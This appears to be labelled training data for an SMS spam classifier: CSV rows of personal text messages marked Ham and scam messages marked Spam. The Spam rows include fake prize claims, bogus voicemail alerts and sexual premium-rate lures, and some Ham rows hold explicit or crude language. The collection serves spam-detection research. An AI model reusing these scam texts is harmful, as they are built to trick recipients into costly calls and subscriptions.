91 | Ham Jus finish my lunch on my way home lor... I tot u dun wan 2 stay in sch today...
92 | Ham Watching cartoon, listening music & at eve had to go temple & church.. What about u?
93 | Spam URGENT! We are trying to contact you. Last weekends draw shows that you have won a £900 prize GUARANTEED. Call 09061701939. Claim code S89. Valid 12hrs only
94 | Ham Does not operate after <#> or what
95 | Spam Buy Space Invaders 4 a chance 2 win orig Arcade Game console. Press 0 for Games Arcade (std WAP charge) See o2.co.uk/games 4 Terms + settings. No purchase
96 | Ham Why is that, princess? I bet the brothas are all chasing you!
97 | Ham What's nannys address?
98 | Ham "Two fundamentals of cool life: ""Walk, like you are the KING""...! OR ""Walk like you Dont care,whoever is the KING""!... Gud nyt"
99 | Ham Am i that much dirty fellow?
100 | Ham Were somewhere on Fredericksburg
101 | Ham Haven't seen my facebook, huh? Lol!
102 | Ham There r many model..sony ericson also der.. <#> ..it luks good bt i forgot modl no
103 | Ham I dont have i shall buy one dear
104 | Ham Sorry, I'll call later
105 | Ham I do know what u mean, is the king of not havin credit! I'm goin2bed now. Night night sweet! Only1more sleep!
106 | Ham Yes i thought so. Thanks.
107 | Ham Haha, that was the first person I was gonna ask
108 | Ham I'm going for bath will msg you next <#> min..
109 | Ham Im cool ta luv but v.tired 2 cause i have been doin loads of planning all wk, we have got our social services inspection at the nursery! Take care & spk sn x.
110 | Ham I thought slide is enough.
111 | Ham Your opinion about me? 1. Over 2. Jada 3. Kusruthi 4. Lovable 5. Silent 6. Spl character 7. Not matured 8. Stylish 9. Simple Pls reply..
112 | Ham Also hi wesley how've you been
113 | Ham No sir. That's why i had an 8-hr trip on the bus last week. Have another audition next wednesday but i think i might drive this time.
114 | Ham I meant middle left or right?
115 | Ham Yeah, where's your class at?
116 | Ham Hmm, too many of them unfortunately... Pics obviously arent hot cakes. Its kinda fun tho
117 | Spam Reply with your name and address and YOU WILL RECEIVE BY POST a weeks completely free accommodation at various global locations www.phb1.com ph:08700435505150p
118 | Ham Big brother‘s really scraped the barrel with this shower of social misfits
119 | Ham Yar... I tot u knew dis would happen long ago already.
120 | Ham Ah, well that confuses things, doesnt it? I thought was friends with now. Maybe i did the wrong thing but i already sort of invited -tho he may not come cos of money.
121 | Ham Cool, we shall go and see, have to go to tip anyway. Are you at home, got something to drop in later? So lets go to town tonight! Maybe mum can take us in.
122 | Ham Yup i thk so until e shop closes lor.
123 | Ham No shit, but I wasn't that surprised, so I went and spent the evening with that french guy I met in town here and we fooled around a bit but I didn't let him fuck me
124 | Ham Just come home. I don't want u to be miserable
125 | Ham How many licks does it take to get to the center of a tootsie pop?
126 | Spam Missed call alert. These numbers called but left no message. 07008009200
127 | Ham For you information, IKEA is spelled with all caps. That is not yelling. when you thought i had left you, you were sitting on the bed among the mess when i came in. i said we were going after you got
128 | Ham Oh ! A half hour is much longer in Syria than Canada, eh ? Wow you must get SO much more work done in a day than us with all that extra time ! *grins*
129 | Ham It shall be fine. I have avalarr now. Will hollalater
130 | Ham We are both fine. Thanks
131 | Spam Sunshine Hols. To claim ur med holiday send a stamped self address envelope to Drinks on Us UK, PO Box 113, Bray, Wicklow, Eire. Quiz Starts Saturday! Unsub Stop
132 | Spam Urgent UR awarded a complimentary trip to EuroDisinc Trav, Aco&Entry41 Or £1000. To claim txt DIS to 87121 18+6*£1.50(moreFrmMob. ShrAcomOrSglSuplt)10, LS1 3AJ
133 | Ham True. It is passable. And if you get a high score and apply for phd, you get 5years of salary. So it makes life easier.
134 | Spam Hi - this is your Mailbox Messaging SMS alert. You have 40 matches. Please call back on 09056242159 to retrieve your messages and matches cc100p/min
135 | Ham "Best line said in Love: . ""I will wait till the day I can forget u Or The day u realize that u cannot forget me.""... Gn"
136 | Ham Fun fact: although you would think armand would eventually build up a tolerance or some shit considering how much he smokes, he gets fucked up in like 2 hits
137 | Ham You've always been the brainy one.
138 | Ham I have a rather prominent bite mark on my right cheek
139 | Ham Home so we can always chat
140 | Ham Is there coming friday is leave for pongal?do you get any news from your work place.
141 | Ham K so am I, how much for an 8th? Fifty?
142 | Ham Dai i downloaded but there is only exe file which i can only run that exe after installing.
143 | Ham S:-)if we have one good partnership going we will take lead:)
144 | Ham And is there a way you can send shade's stuff to her. And she has been wonderful too.
145 | Spam Dont forget you can place as many FREE Requests with 1stchoice.co.uk as you wish. For more Information call 08707808226.
146 | Ham Dunno lei he neva say...
147 | Ham Hi Harish's rent has been transfred to ur Acnt.
148 | Ham Gettin rdy to ship comp
149 | Ham You will go to walmart. I.ll stay.
150 | Ham I'm still looking for a car to buy. And have not gone 4the driving test yet.
151 | Ham Fine i miss you very much.
152 | Spam RECPT 1/3. You have ordered a Ringtone. Your order is being processed...
153 | Ham Well there's still a bit left if you guys want to tonight
154 | Ham Hi. I'm always online on yahoo and would like to chat with you someday
155 | Ham Nope... C ü then...
156 | Ham What i mean is do they come chase you out when its over or is it stated you can watch as many movies as you want.
157 | Ham Ok... U enjoy ur shows...
158 | Ham Hello which the site to download songs its urgent pls
159 | Ham You are a great role model. You are giving so much and i really wish each day for a miracle but God as a reason for everything and i must say i wish i knew why but i dont. I've looked up to you since
160 | Ham Mmmm.... I cant wait to lick it!
161 | Ham It's wylie, you in tampa or sarasota?
162 | Ham Love has one law; Make happy the person you love. In the same way friendship has one law; Never make ur friend feel alone until you are alive.... Gud night
163 | Ham I'm really not up to it still tonight babe
164 | Ham U coming back 4 dinner rite? Dad ask me so i re confirm wif u...
165 | Ham The sign of maturity is not when we start saying big things.. But actually it is, when we start understanding small things... *HAVE A NICE EVENING* BSLVYL
166 | Spam You are being contacted by our Dating Service by someone you know! To find out who it is, call from your mobile or landline 09064017305 PoBox75LDNS7
167 | Ham How's it feel? Mr. Your not my real Valentine just my yo Valentine even tho u hardly play!!
168 | Spam No. 1 Nokia Tone 4 ur mob every week! Just txt NOK to 87021. 1st Tone FREE ! so get txtin now and tell ur friends. 150p/tone. 16 reply HL 4info
169 | Ham Howz that persons story
170 | Ham Sorry, I'll call later
171 | Ham Boooo you always work. Just quit.
172 | Ham Fyi I'm gonna call you sporadically starting at like <#> bc we are not not doin this shit
173 | Ham No problem with the renewal. I.ll do it right away but i dont know his details.
174 | Spam Free video camera phones with Half Price line rental for 12 mths and 500 cross ntwk mins 100 txts. Call MobileUpd8 08001950382 or Call2OptOut/674&
175 | Ham Tell my bad character which u Dnt lik in me. I'll try to change in <#> . I ll add tat 2 my new year resolution. Waiting for ur reply.Be frank...good morning.
176 | Ham I have gone into get info bt dont know what to do
177 | Ham My love ... I hope your not doing anything drastic. Don't you dare sell your pc or your phone ...
178 | Ham <#> is fast approaching. So, Wish u a very Happy New Year Happy Sankranti Happy republic day Happy Valentines Day Happy Shivratri Happy Ugadi Happy Fools day Happy May Day Happy Independence Da
179 | Ham Dear friends, sorry for the late information. Today is the birthday of our loving Ar.Praveesh. for more details log on to face book and see. Its his number + <#> . Dont miss a delicious treat.
180 | Ham Horrible gal. Me in sch doing some stuff. How come u got mc?
181 | Spam You have 1 new voicemail. Please call 08719181513.
182 | Ham No it will reach by 9 only. She telling she will be there. I dont know
183 | Ham Carlos says he'll be at mu in <#> minutes
184 | Spam SMSSERVICES. for yourinclusive text credits, pls goto www.comuk.net login= 3qxj9 unsubscribe with STOP, no extra charge. help 08702840625.COMUK. 220-CM2 9AE
185 | Ham Yes, princess. Toledo.
186 | Ham Ok ill send you with in <DECIMAL> ok.
187 | Ham I'm okay. Chasing the dream. What's good. What are you doing next.
188 | Ham Boo. How's things? I'm back at home and a little bored already :-(
189 | Ham What is important is that you prevent dehydration by giving her enough fluids
190 | Ham Am surfing online store. For offers do you want to buy any thing.
191 | Ham Buzz! Hey, my Love ! I think of you and hope your day goes well. Did you sleep in ? I miss you babe. I long for the moment we are together again*loving smile*
192 | Ham Turns out my friends are staying for the whole show and won't be back til ~ <#> , so feel free to go ahead and smoke that $ <#> worth
193 | Ham Yep. I do like the pink furniture tho.
194 | Ham In which place do you want da.
195 | Ham Hey happy birthday...
196 | Ham Going to take your babe out ?
197 | Spam Urgent! call 09066612661 from landline. Your complementary 4* Tenerife Holiday or £10,000 cash await collection SAE T&Cs PO Box 3 WA14 2PX 150ppm 18+ Sender: Hol Offer
198 | Ham Just checking in on you. Really do miss seeing Jeremiah. Do have a great month
199 | Ham Where are you?when wil you reach here?
200 | Ham Hmmm.still we dont have opener?
201 | Spam Congrats! 2 mobile 3G Videophones R yours. call 09063458130 now! videochat wid your mates, play java games, Dload polyPH music, noline rentl.
202 | Ham Haha better late than ever, any way I could swing by?
203 | Spam Ur TONEXS subscription has been renewed and you have been charged £4.50. You can choose 10 more polys this month. www.clubzed.co.uk *BILLING MSG*
204 | Ham Another month. I need chocolate weed and alcohol.
205 | Spam How about getting in touch with folks waiting for company? Just txt back your NAME and AGE to opt in! Enjoy the community (150p/SMS)
206 | Ham Go chase after her and run her over while she's crossing the street
207 | Ham Is ur paper today in e morn or aft?
208 | Ham Lolnice. I went from a fish to ..water.?
209 | Ham Can you do online transaction?
210 | Ham Like <#> , same question
211 | Ham I got arrested for possession at, I shit you not, <TIME> pm
212 | Ham Hey gals...U all wanna meet 4 dinner at nìte?
213 | Ham Its hard to believe things like this. All can say lie but think twice before saying anything to me.
214 | Ham We not watching movie already. Xy wants 2 shop so i'm shopping w her now.
215 | Ham My exam is for february 4. Wish you a great day.
216 | Ham So do you have samus shoulders yet
217 | Ham You best watch what you say cause I get drunk as a motherfucker
218 | Ham have * good weekend.
219 | Ham Oh and by the way you do have more food in your fridge! Want to go out for a meal tonight?
220 | Ham happened here while you were adventuring
221 | Spam http//tms. widelive.com/index. wml?id=820554ad0a1705572711&first=true¡C C Ringtone¡
222 | Ham Greetings me, ! Consider yourself excused.
223 | Ham I wont touch you with out your permission.
224 | Ham I don't know jack shit about anything or i'd say/ask something helpful but if you want you can pretend that I did and just text me whatever in response to the hypotheticalhuagauahahuagahyuhagga
225 | Ham Oh ho. Is this the first time u use these type of words
226 | Ham One small prestige problem now.
227 | Spam Sunshine Quiz Wkly Q! Win a top Sony DVD player if u know which country Liverpool played in mid week? Txt ansr to 82277. £1.50 SP:Tyrone
228 | Ham Carlos'll be here in a minute if you still need to buy
229 | Ham Ü collecting ur laptop then going to configure da settings izzit?
230 | Ham Nice talking to you! please dont forget my pix :) i want to see all of you...
231 | Ham Its just the effect of irritation. Just ignore it
232 | Spam Sunshine Hols. To claim ur med holiday send a stamped self address envelope to Drinks on Us UK, PO Box 113, Bray, Wicklow, Eire. Quiz Starts Saturday! Unsub Stop
233 | Ham Thank you princess! You are so sexy...
234 | Ham He is world famamus....
235 | Ham So ü'll be submitting da project tmr rite?
236 | Spam Valentines Day Special! Win over £1000 in our quiz and take your partner on the trip of a lifetime! Send GO to 83600 now. 150p/msg rcvd. CustCare:08718720201.
237 | Ham Yup... Hey then one day on fri we can ask miwa and jiayin take leave go karaoke
238 | Ham And you! Will expect you whenever you text! Hope all goes well tomo
239 | Ham Yup it's at paragon... I havent decided whether 2 cut yet... Hee...
240 | Ham "'An Amazing Quote'' - ""Sometimes in life its difficult to decide whats wrong!! a lie that brings a smile or the truth that brings a tear...."""
241 | Ham Let me know how it changes in the next 6hrs. It can even be appendix but you are out of that age range. However its not impossible. So just chill and let me know in 6hrs
242 | Ham Okie but i scared u say i fat... Then u dun wan me already...
243 | Spam we tried to contact you re your response to our offer of a new nokia fone and camcorder hit reply or call 08000930705 for delivery
244 | Ham Better than bb. If he wont use it, his wife will or them doctor
245 | Ham Shall i start from hear.
246 | Ham Your opinion about me? 1. Over 2. Jada 3. Kusruthi 4. Lovable 5. Silent 6. Spl character 7. Not matured 8. Stylish 9. Simple Pls reply..
247 | Spam You have 1 new message. Please call 08718738034.
248 | Ham Idk. I'm sitting here in a stop and shop parking lot right now bawling my eyes out because i feel like i'm a failure in everything. Nobody wants me and now i feel like i'm failing you.
249 | Spam This is the 2nd time we have tried to contact u. U have won the £1450 prize to claim just call 09053750005 b4 310303. T&Cs/stop SMS 08718725756. 140ppm
250 | Ham Hey mate. Spoke to the mag people. We‘re on. the is deliver by the end of the month. Deliver on the 24th sept. Talk later.
251 | Ham Your board is working fine. The issue of overheating is also reslove. But still software inst is pending. I will come around 8'o clock.
252 | Ham It does it on its own. Most of the time it fixes my spelling. But sometimes it gets a completely diff word. Go figure
253 | Ham Wish i were with you now!
254 | Ham Your gonna have to pick up a $1 burger for yourself on your way home. I can't even move. Pain is killing me.
255 | Spam Bloomberg -Message center +447797706009 Why wait? Apply for your future http://careers. bloomberg.com
256 | Ham Is ur lecture over?
257 | Ham Dont give a monkeys wot they think and i certainly don't mind. Any friend of mine&all that! Just don't sleep wiv , that wud be annoyin!
258 |
--------------------------------------------------------------------------------
/spam_detector/spam_data/experiment_1/train_512.csv:
--------------------------------------------------------------------------------
1 | label text
2 | Ham Yeah I think my usual guy's still passed out from last night, if you get ahold of anybody let me know and I'll throw down
3 | Spam Mila, age23, blonde, new in UK. I look sex with UK guys. if u like fun with me. Text MTALK to 69866.18 . 30pp/txt 1st 5free. £1.50 increments. Help08718728876
4 | Spam Mila, age23, blonde, new in UK. I look sex with UK guys. if u like fun with me. Text MTALK to 69866.18 . 30pp/txt 1st 5free. £1.50 increments. Help08718728876
5 | Ham "And that is the problem. You walk around in ""julianaland"" oblivious to what is going on around you. I say the same things constantly and they go in one ear and out the other while you go off doing wha"
6 | Spam Urgent! Please call 09066612661 from your landline, your complimentary 4* Lux Costa Del Sol holiday or £1000 CASH await collection. ppm 150 SAE T&Cs James 28, EH74RR
7 | Spam We tried to call you re your reply to our sms for a video mobile 750 mins UNLIMITED TEXT free camcorder Reply or call now 08000930705 Del Thurs
8 | Spam Urgent! Please call 09061743811 from landline. Your ABTA complimentary 4* Tenerife Holiday or £5000 cash await collection SAE T&Cs Box 326 CW25WX 150ppm
9 | Ham The guy did some bitching but I acted like i'd be interested in buying something else next week and he gave it to us for free
10 | Spam Sorry I missed your call let's talk when you have the time. I'm on 07090201529
11 | Spam Free msg: Single? Find a partner in your area! 1000s of real people are waiting to chat now!Send CHAT to 62220Cncl send STOPCS 08717890890£1.50 per msg
12 | Ham I'm at work. Please call
13 | Ham K do I need a login or anything
14 | Spam Hi I'm sue. I am 20 years old and work as a lapdancer. I love sex. Text me live - I'm i my bedroom now. text SUE to 89555. By TextOperator G2 1DA 150ppmsg 18+
15 | Ham S.s:)i thinl role is like sachin.just standing. Others have to hit.
16 | Ham Do you work all this week ?
17 | Spam Free tones Hope you enjoyed your new content. text stop to 61610 to unsubscribe. help:08712400602450p Provided by tones2you.co.uk
18 | Ham Where is that one day training:-)
19 | Ham "What part of ""don't initiate"" don't you understand"
20 | Ham alright tyler's got a minor crisis and has to be home sooner than he thought so be here asap
21 | Spam 83039 62735=£450 UK Break AccommodationVouchers terms & conditions apply. 2 claim you mustprovide your claim number which is 15541
22 | Spam I'd like to tell you my deepest darkest fantasies. Call me 09094646631 just 60p/min. To stop texts call 08712460324 (nat rate)
23 | Spam Congrats! 1 year special cinema pass for 2 is yours. call 09061209465 now! C Suprman V, Matrix3, StarWars3, etc all 4 FREE! bx420-ip4-5we. 150pm. Dont miss out!
24 | Spam Had your mobile 11 months or more? U R entitled to Update to the latest colour mobiles with camera for Free! Call The Mobile Update Co FREE on 08002986030
25 | Spam 5 Free Top Polyphonic Tones call 087018728737, National Rate. Get a toppoly tune sent every week, just text SUBPOLY to 81618, £3 per pole. UnSub 08718727870.
26 | Ham Well, I have to leave for my class babe ... You never came back to me ... :-( ... Hope you have a nice sleep, my love
27 | Spam Hi ya babe x u 4goten bout me?' scammers getting smart..Though this is a regular vodafone no, if you respond you get further prem rate msg/subscription. Other nos used also. Beware!
28 | Ham HEY BABE! FAR 2 SPUN-OUT 2 SPK AT DA MO... DEAD 2 DA WRLD. BEEN SLEEPING ON DA SOFA ALL DAY, HAD A COOL NYTHO, TX 4 FONIN HON, CALL 2MWEN IM BK FRMCLOUD 9! J X
29 | Spam **FREE MESSAGE**Thanks for using the Auction Subscription Service. 18 . 150p/MSGRCVD 2 Skip an Auction txt OUT. 2 Unsubscribe txt STOP CustomerCare 08718726270
30 | Spam For sale - arsenal dartboard. Good condition but no doubles or trebles!
31 | Spam URGENT! Your Mobile number has been awarded a 2000 prize GUARANTEED. Call 09061790125 from landline. Claim 3030. Valid 12hrs only 150ppm
32 | Spam Win the newest Harry Potter and the Order of the Phoenix (Book 5) reply HARRY, answer 5 questions - chance to be the first among readers!
33 | Ham Nan sonathaya soladha. Why boss?
34 | Ham It's fine, imma get a drink or somethin. Want me to come find you?
35 | Ham Ok.
36 | Ham Erm. I thought the contract ran out the4th of october.
37 | Spam 8007 25p 4 Alfie Moon's Children in Need song on ur mob. Tell ur m8s. Txt TONE CHARITY to 8007 for nokias or POLY CHARITY for polys :zed 08701417012 profit 2 charity
38 | Spam No. 1 Nokia Tone 4 ur mob every week! Just txt NOK to 87021. 1st Tone FREE ! so get txtin now and tell ur friends. 150p/tone. 16 reply HL 4info
39 | Spam Sexy Singles are waiting for you! Text your AGE followed by your GENDER as wither M or F E.G.23F. For gay men text your AGE followed by a G. e.g.23G.
40 | Spam Gr8 Poly tones 4 ALL mobs direct 2u rply with POLY TITLE to 8007 eg POLY BREATHE1 Titles: CRAZYIN, SLEEPINGWITH, FINEST, YMCA :getzed.co.uk POBox365O4W45WQ 300p
41 | Spam For ur chance to win a £250 cash every wk TXT: ACTION to 80608. T's&C's www.movietrivia.tv custcare 08712405022, 1x150p/wk.
42 | Ham Yes.he have good crickiting mind
43 | Ham HEY MATE! HOWS U HONEY?DID U AVE GOOD HOLIDAY? GIMMI DE GOSS!x
44 | Spam Free Top ringtone -sub to weekly ringtone-get 1st week free-send SUBPOLY to 81618-?3 per week-stop sms-08718727870
45 | Ham I love your ass! Do you enjoy doggy style? :)
46 | Ham Sometimes we put walls around our hearts,not just to be safe from getting hurt.. But to find out who cares enough to break the walls & get closer.. GOODNOON:)
47 | Ham 1 in cbe. 2 in chennai.
48 | Spam PRIVATE! Your 2003 Account Statement for 07753741225 shows 800 un-redeemed S. I. M. points. Call 08715203677 Identifier Code: 42478 Expires 24/10/04
49 | Ham NEFT Transaction with reference number <#> for Rs. <DECIMAL> has been credited to the beneficiary account on <#> at <TIME> : <#>
50 | Spam 88066 FROM 88066 LOST 3POUND HELP
51 | Spam Well done ENGLAND! Get the official poly ringtone or colour flag on yer mobile! text TONE or FLAG to 84199 NOW! Opt-out txt ENG STOP. Box39822 W111WX £1.50
52 | Ham How long before you get reply, just defer admission til next semester
53 | Ham Hi :)finally i completed the course:)
54 | Ham I am in tirupur da, once you started from office call me.
55 | Ham Happy birthday... May u find ur prince charming soon n dun work too hard...
56 | Ham Love it! Daddy will make you scream with pleasure! I am going to slap your ass with my dick!
57 | Ham Yup no more already... Thanx 4 printing n handing it up.
58 | Spam Wanna get laid 2nite? Want real Dogging locations sent direct to ur mobile? Join the UK's largest Dogging Network. Txt PARK to 69696 now! Nyt. ec2a. 3lp £1.50/msg
59 | Ham 2 and half years i missed your friendship:-)
60 | Ham Now got tv 2 watch meh? U no work today?
61 | Ham Aiyar hard 2 type. U later free then tell me then i call n scold n tell u.
62 | Spam WIN a £200 Shopping spree every WEEK Starting NOW. 2 play text STORE to 88039. SkilGme. TsCs08714740323 1Winawk! age16 £1.50perweeksub.
63 | Spam Congratulations ur awarded either a yrs supply of CDs from Virgin Records or a Mystery Gift GUARANTEED Call 09061104283 Ts&Cs www.smsco.net £1.50pm approx 3mins
64 | Spam U have a Secret Admirer who is looking 2 make contact with U-find out who they R*reveal who thinks UR so special-call on 09065171142-stopsms-08
65 | Ham Good day to You too.Pray for me.Remove the teeth as its painful maintaining other stuff.
66 | Spam Thanks 4 your continued support Your question this week will enter u in2 our draw 4 £100 cash. Name the NEW US President? txt ans to 80082
67 | Spam 4mths half price Orange line rental & latest camera phones 4 FREE. Had your phone 11mths+? Call MobilesDirect free on 08000938767 to update now! or2stoptxt T&Cs
68 | Ham No one interested. May be some business plan.
69 | Ham Ya ok, then had dinner?
70 | Spam URGENT! Your mobile number *************** WON a £2000 Bonus Caller prize on 10/06/03! This is the 2nd attempt to reach you! Call 09066368753 ASAP! Box 97N7QP, 150ppm
71 | Ham Neshanth..tel me who r u?
72 | Ham Convey my regards to him
73 | Ham Idk. You keep saying that you're not, but since he moved, we keep butting heads over freedom vs. responsibility. And i'm tired. I have so much other shit to deal with that i'm barely keeping myself to
74 | Ham Sir, i am waiting for your call, once free please call me.
75 | Spam ree entry in 2 a weekly comp for a chance to win an ipod. Txt POD to 80182 to get entry (std txt rate) T&C's apply 08452810073 for details 18+
76 | Spam Thanks for your subscription to Ringtone UK your mobile will be charged £5/month Please confirm by replying YES or NO. If you reply NO you will not be charged
77 | Ham Set a place for me in your heart and not in your mind, as the mind easily forgets but the heart will always remember. Wish you Happy Valentines Day!
78 | Ham In xam hall boy asked girl Tell me the starting term for dis answer I can den manage on my own After lot of hesitation n lookin around silently she said THE! intha ponnungale ipaditan;)
79 | Ham Hey you gave them your photo when you registered for driving ah? Tmr wanna meet at yck?
80 | Spam FREE entry into our £250 weekly comp just send the word WIN to 80086 NOW. 18 T&C www.txttowin.co.uk
81 | Ham 1) Go to write msg 2) Put on Dictionary mode 3)Cover the screen with hand, 4)Press <#> . 5)Gently remove Ur hand.. Its interesting..:)
82 | Spam Your 2004 account for 07XXXXXXXXX shows 786 unredeemed points. To claim call 08719181259 Identifier code: XXXXX Expires 26.03.05
83 | Spam You've won tkts to the EURO2004 CUP FINAL or £800 CASH, to collect CALL 09058099801 b4190604, POBOX 7876150ppm
84 | Ham Its not that time of the month nor mid of the time?
85 | Spam URGENT! Your Mobile number has been awarded with a £2000 prize GUARANTEED. Call 09061790126 from land line. Claim 3030. Valid 12hrs only 150ppm
86 | Spam Santa Calling! Would your little ones like a call from Santa Xmas eve? Call 09058094583 to book your time.
87 | Spam 3 FREE TAROT TEXTS! Find out about your love life now! TRY 3 FOR FREE! Text CHANCE to 85555 16 only! After 3 Free, Msgs £1.50 each
88 | Spam U were outbid by simonwatson5120 on the Shinco DVD Plyr. 2 bid again, visit sms. ac/smsrewards 2 end bid notifications, reply END OUT
89 | Spam URGENT! We are trying to contact U Todays draw shows that you have won a £800 prize GUARANTEED. Call 09050000460 from land line. Claim J89. po box245c2150pm
90 | Spam Get 3 Lions England tone, reply lionm 4 mono or lionp 4 poly. 4 more go 2 www.ringtones.co.uk, the original n best. Tones 3GBP network operator rates apply.
91 | Ham Now that you have started dont stop. Just pray for more good ideas and anything i see that can help you guys i.ll forward you a link.
92 | Spam Customer service announcement. We recently tried to make a delivery to you but were unable to do so, please call 07090298926 to re-schedule. Ref:9307622
93 | Ham Why are u up so early?
94 | Ham Exactly. Anyways how far. Is jide her to study or just visiting
95 | Ham No. I.ll meet you in the library
96 | Ham I don't run away frm u... I walk slowly & it kills me that u don't care enough to stop me...
97 | Spam You will be receiving this week's Triple Echo ringtone shortly. Enjoy it!
98 | Spam URGENT, IMPORTANT INFORMATION FOR O2 USER. TODAY IS YOUR LUCKY DAY! 2 FIND OUT WHY LOG ONTO HTTP://WWW.URAWINNER.COM THERE IS A FANTASTIC SURPRISE AWAITING FOR YOU
99 | Ham At 4. Let's go to bill millers
100 | Ham Solve d Case : A Man Was Found Murdered On <DECIMAL> . <#> AfterNoon. 1,His wife called Police. 2,Police questioned everyone. 3,Wife: Sir,I was sleeping, when the murder took place. 4.Co
101 | Ham Never try alone to take the weight of a tear that comes out of ur heart and falls through ur eyes... Always remember a STUPID FRIEND is here to share... BSLVYL
102 | Ham New car and house for my parents.:)i have only new job in hand:)
103 | Spam Your weekly Cool-Mob tones are ready to download !This weeks new Tones include: 1) Crazy Frog-AXEL F>>> 2) Akon-Lonely>>> 3) Black Eyed-Dont P >>>More info in n
104 | Ham If you ask her or she say any please message.
105 | Ham Sorry,in meeting I'll call later
106 | Ham I'll text carlos and let you know, hang on
107 | Ham I want to sent <#> mesages today. Thats y. Sorry if i hurts
108 | Ham Si.como no?!listened2the plaid album-quite gd&the new air1 which is hilarious-also boughtbraindancea comp.ofstuff on aphexs ;abel,u hav2hear it!c u sn xxxx
109 | Ham 5 nights...We nt staying at port step liao...Too ex
110 | Ham Can u get pic msgs to your phone?
111 | Spam Call 09095350301 and send our girls into erotic ecstacy. Just 60p/min. To stop texts call 08712460324 (nat rate)
112 | Ham K.k.how is your business now?
113 | Spam FreeMsg Today's the day if you are ready! I'm horny & live in your town. I love sex fun & games! Netcollex Ltd 08700621170150p per msg reply Stop to end
114 | Ham Have you heard from this week?
115 | Spam CLAIRE here am havin borin time & am now alone U wanna cum over 2nite? Chat now 09099725823 hope 2 C U Luv CLAIRE xx Calls£1/minmoremobsEMSPOBox45PO139WA
116 | Spam Romantic Paris. 2 nights, 2 flights from £79 Book now 4 next year. Call 08704439680Ts&Cs apply.
117 | Ham Talk to g and x about that
118 | Ham Go until jurong point, crazy.. Available only in bugis n great world la e buffet... Cine there got amore wat...
119 | Ham K then 2marrow are you coming to class.
120 | Spam Congrats! Nokia 3650 video camera phone is your Call 09066382422 Calls cost 150ppm Ave call 3mins vary from mobiles 16+ Close 300603 post BCM4284 Ldn WC1N3XX
121 | Spam Dear Voucher Holder, To claim this weeks offer, at your PC please go to http://www.wtlp.co.uk/text. Ts&Cs apply.
122 | Spam U can WIN £100 of Music Gift Vouchers every week starting NOW Txt the word DRAW to 87066 TsCs www.Idew.com SkillGame, 1Winaweek, age16. 150ppermessSubscription
123 | Spam Married local women looking for discreet action now! 5 real matches instantly to your phone. Text MATCH to 69969 Msg cost 150p 2 stop txt stop BCMSFWC1N3XX
124 | Spam Someone has conacted our dating service and entered your phone because they fancy you!To find out who it is call from landline 09111030116. PoBox12n146tf15
125 | Ham Shhhhh nobody is supposed to know!
126 | Ham I'm home. Doc gave me pain meds says everything is fine.
127 | Spam Hi, this is Mandy Sullivan calling from HOTMIX FM...you are chosen to receive £5000.00 in our Easter Prize draw.....Please telephone 09041940223 to claim before 29/03/05 or your prize will be transfer
128 | Ham how tall are you princess?
129 | Ham What time. I‘m out until prob 3 or so
130 | Spam Knock Knock Txt whose there to 80082 to enter r weekly draw 4 a £250 gift voucher 4 a store of yr choice. T&Cs www.tkls.com age16 to stoptxtstop£1.50/week
131 | Ham Love you aathi..love u lot..
132 | Spam sexy sexy cum and text me im wet and warm and ready for some porn! u up for some fun? THIS MSG IS FREE RECD MSGS 150P INC VAT 2 CANCEL TEXT STOP
133 | Spam You have an important customer service announcement. Call FREEPHONE 0800 542 0825 now!
134 | Spam Do you want a new Video handset? 750 any time any network mins? UNLIMITED TEXT? Camcorder? Reply or Call now 08000930705 for del Sat AM
135 | Ham Nothin comes to my mind. Ü help me buy hanger lor. Ur laptop not heavy?
136 | Ham Long beach lor. Expected... U having dinner now?
137 | Ham Talk With Yourself Atleast Once In A Day...!!! Otherwise You Will Miss Your Best FRIEND In This WORLD...!!! -Shakespeare- SHESIL <#>
138 | Ham A little. Meds say take once every 8 hours. It's only been 5 but pain is back. So I took another. Hope I don't die
139 | Ham Its like that hotel dusk game i think. You solve puzzles in a area thing
140 | Spam Want a new Video Phone? 750 anytime any network mins? Half price line rental free text for 3 months? Reply or call 08000930705 for free delivery
141 | Spam EASTENDERS TV Quiz. What FLOWER does DOT compare herself to? D= VIOLET E= TULIP F= LILY txt D E or F to 84025 NOW 4 chance 2 WIN £100 Cash WKENT/150P16+
142 | Ham Beerage?
143 | Ham V nice! Off 2 sheffield tom 2 air my opinions on categories 2 b used 2 measure ethnicity in next census. Busy transcribing. :-)
144 | Spam Sunshine Quiz Wkly Q! Win a top Sony DVD player if u know which country the Algarve is in? Txt ansr to 82277. £1.50 SP:Tyrone
145 | Spam From next month get upto 50% More Calls 4 Ur standard network charge 2 activate Call 9061100010 C Wire3.net 1st4Terms PoBox84 M26 3UZ Cost £1.50 min MobcudB more
146 | Ham Fuck babe ... I miss you already, you know ? Can't you let me send you some money towards your net ? I need you ... I want you ... I crave you ...
147 | Ham Mm you ask him to come its enough :-)
148 | Spam URGENT! Your Mobile number has been awarded with a £2000 prize GUARANTEED. Call 09061790121 from land line. Claim 3030. Valid 12hrs only 150ppm
149 | Ham Am in gobi arts college
150 | Spam Thank you, winner notified by sms. Good Luck! No future marketing reply STOP to 84122 customer services 08450542832
151 | Ham She's fine. Good to hear from you. How are you my dear? Happy new year oh.
152 | Spam URGENT! Your Mobile number has been awarded with a £2000 Bonus Caller Prize. Call 09058095201 from land line. Valid 12hrs only
153 | Spam Claim a 200 shopping spree, just call 08717895698 now! Have you won! MobStoreQuiz10ppm
154 | Spam U’ve Bin Awarded £50 to Play 4 Instant Cash. Call 08715203028 To Claim. EVERY 9th Player Wins Min £50-£500. OptOut 08718727870
155 | Spam Please CALL 08712402578 immediately as there is an urgent message waiting for you
156 | Spam +123 Congratulations - in this week's competition draw u have won the £1450 prize to claim just call 09050002311 b4280703. T&Cs/stop SMS 08718727868. Over 18 only 150ppm
157 | Ham It should take about <#> min
158 | Spam Sex up ur mobile with a FREE sexy pic of Jordan! Just text BABE to 88600. Then every wk get a sexy celeb! PocketBabe.co.uk 4 more pics. 16 £3/wk 087016248
159 | Spam January Male Sale! Hot Gay chat now cheaper, call 08709222922. National rate from 1.5p/min cheap to 7.8p/min peak! To stop texts call 08712460324 (10p/min)
160 | Spam Double Mins & Double Txt & 1/2 price Linerental on Latest Orange Bluetooth mobiles. Call MobileUpd8 for the very latest offers. 08000839402 or call2optout/LF56
161 | Ham Thanks love. But am i doing torch or bold.
162 | Ham We have all rounder:)so not required:)
163 | Ham What you did in leave.
164 | Ham Which is weird because I know I had it at one point
165 | Ham I sent you the prices and do you mean the <#> g,
